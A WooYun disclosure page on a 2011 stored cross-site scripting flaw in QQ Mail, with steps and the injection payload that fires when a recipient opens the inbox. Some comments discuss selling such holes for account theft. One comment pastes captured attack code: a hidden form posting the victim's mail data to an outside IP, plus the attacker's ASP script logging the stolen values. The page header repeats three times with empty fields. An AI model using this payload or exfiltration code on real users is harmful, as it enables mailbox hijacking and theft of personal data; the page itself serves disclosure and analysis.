QQ邮箱跨站 | wooyun-2011-02335| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-02335

漏洞标题：QQ邮箱跨站

漏洞作者： s!lly3r

提交时间：2011-06-29 01:12

修复时间：2011-07-29 03:00

公开时间：2011-07-29 03:00

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2011-06-29：细节已通知厂商并且等待厂商处理中
2011-06-30：厂商已经确认，细节仅向厂商公开
2011-07-10：细节向核心白帽子及相关领域专家公开
2011-07-20：细节向普通白帽子公开
2011-07-30：细节向实习白帽子公开
2011-07-29：细节向公众公开

简要描述：

QQ邮箱跨站,非本地,可发送,点击收件箱列表即触发.

详细说明：

测试过程使用firebug;
第一步:写信,填写好目的邮箱标题内容,然后打开firebug搜索"xqqstyle",编辑html把id为xqqstyle的输入框显示出来.直接修改值貌似不行,没去看哈哈 ^_^.如图

第二步:在显示出来的输入框里输入

14','9999');alert('Owned by s!lly3r');//

如图

第三步:发送^_^,对方点击收件箱列表出来华丽的框框.如图

最终呈现的代码是

漏洞证明：

修复方案：

^_^

版权声明：转载请注明来源 s!lly3r@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2011-06-30 11:40

厂商回复：

非常感谢

漏洞评价：

2011-06-29 02:13 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

只能说牛逼大了半夜不睡的都很牛逼
2011-06-29 05:12 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近，再也不当上错图的2...)

刚刚春梦的路过
2011-06-29 09:30 | 左右 ( 路人 | Rank:23 漏洞数:3 | 左右 ? 左. : 右.)

熊猫大侠啊~~~
2011-06-29 10:09 | 狗样的男人 ( 实习白帽子 | Rank:42 漏洞数:11 )

这个可以牛逼- -
2011-06-29 13:15 | 蚊虫 ( 实习白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)

以前有人向我兜售这个洞..
2011-06-29 13:22 | jsbug ( 普通白帽子 | Rank:117 漏洞数:16 )

彩色标题?
2011-06-29 13:34 | p.z ( 普通白帽子 | Rank:411 漏洞数:40 )

顶啊!
2011-06-29 14:12 | s!lly3r ( 实习白帽子 | Rank:52 漏洞数:2 )

jsbug威武,弱弱问下这样东西能卖?求black market内幕
2011-06-29 14:18 | 蚊虫 ( 实习白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)

嗯,当然能卖,用来挂马盗号什么的,很值钱,我有时候也收来转手你懂的
2011-06-29 15:37 | jsbug ( 普通白帽子 | Rank:117 漏洞数:16 )

我恨我猜对了啊.
2011-06-29 17:05 | pg5yl8 ( 实习白帽子 | Rank:91 漏洞数:12 | 我神马都不会但我常常被人日这是为神马呢)

这牛逼···
2011-06-29 18:05 | p.z ( 普通白帽子 | Rank:411 漏洞数:40 )

卖给lake2 他专收这个
2011-06-30 09:16 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

大牛啊！！！
2011-07-03 14:33 | 晴天小铸 ( 普通白帽子 | Rank:106 漏洞数:31 | 退出黑客界的纠纷,低调求发展。)

helen 被人中招了 <DIV id=abcb_ext1 title="<form name='my_form_' method='post' action=' http://210.40.132.155/Setting/a.asp' target='my_frame1_' > <input type='hidden' name='my_data_mail' value='305536777@qq.com'><input type='hidden' name='my_data_exte' value=''></form><iframe id='my_frame1_' height=0 name='my_frame1_' frameborder=0 scrolling=no></iframe> " style="DISPLAY: none"></DIV><XMP></XMP> <STYLE type=text/css>#02 {layout-grid-line:"</XMP> "}</STYLE> <XMP></XMP></DIV> 这个是我们分析的中招代码接收代码 <% Function Format_Time(s_Time, n_Flag) Dim y, m, d, h, mi, s Format_Time = "" If IsDate(s_Time) = False Then Exit Function y = cstr(year(s_Time)) m = cstr(month(s_Time)) If len(m) = 1 Then m = "0" & m d = cstr(day(s_Time)) If len(d) = 1 Then d = "0" & d h = cstr(hour(FormatDateTime(s_Time, 4))) If len(h) = 1 Then h = "0" & h mi = cstr(minute(s_Time)) If len(mi) = 1 Then mi = "0" & mi s = cstr(second(s_Time)) If len(s) = 1 Then s = "0" & s Select Case n_Flag Case 0 ' yyyy-mm-dd_hh:mm:ss Format_Time = y & "-" & m & "-" & d & "_" & h & ":" & mi & ":" &s Case 1 ' yyyy-mm-dd hh:mm:ss Format_Time = y & "-" & m & "-" & d & " " & h & ":" & mi & ":" & s End Select End Function %> <% filename="tet.txt" set fso = Server.CreateObject("Scripting.FileSystemObject") set fout = fso.OpenTextFile(server.mappath("" & filename & ""), 8, true) ret1 = Request.Form("my_data_mail") ret2 = Request.Form("my_data_exte") userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR") If userip = "" Then userip = Request.ServerVariables("REMOTE_ADDR") //IP End If str1 = replace(ret1, "%20", "") str2 = replace(ret2, ";%20", ";") if len(str1) > 7 And len(str2) > 20 Then fout.write Format_Time(now(), 0) & " " & str1 & "(" & userip & ")*" & str2 & chr(13) & chr(10) End If set fout=nothing set fso=nothing %> my_data_exte my_data_mail 应该是以前类似QQ空间 key的运用那些人进了helen邮箱想社helen支付宝但是helen有U盾嘎嘎！
2011-07-29 10:36 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

赞这个漏洞太经典了！！
2011-07-29 14:49 | youstar ( 实习白帽子 | Rank:34 漏洞数:8 | 我们人啊~)

这个洞给力呀
2011-07-30 10:40 | gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

看来QQ邮箱的XSS还是蛮多的。
2012-02-12 15:35 | pestu ( 普通白帽子 | Rank:170 漏洞数:13 | 关注计算机网络安全 lnmpa技术)

经典学习了
2013-08-23 22:21 | Night ( 实习白帽子 | Rank:57 漏洞数:16 )

给力了。
2014-08-27 21:34 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要，暂别一段时间)

史前教科书留名

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-02335

漏洞标题：QQ邮箱跨站

相关厂商：腾讯

漏洞作者： s!lly3r

提交时间：2011-06-29 01:12

修复时间：2011-07-29 03:00

公开时间：2011-07-29 03:00

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 s!lly3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-02335

漏洞标题：QQ邮箱跨站

相关厂商：腾讯

漏洞作者： s!lly3r

提交时间：2011-06-29 01:12

修复时间：2011-07-29 03:00

公开时间：2011-07-29 03:00

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2011-02335"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 s!lly3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：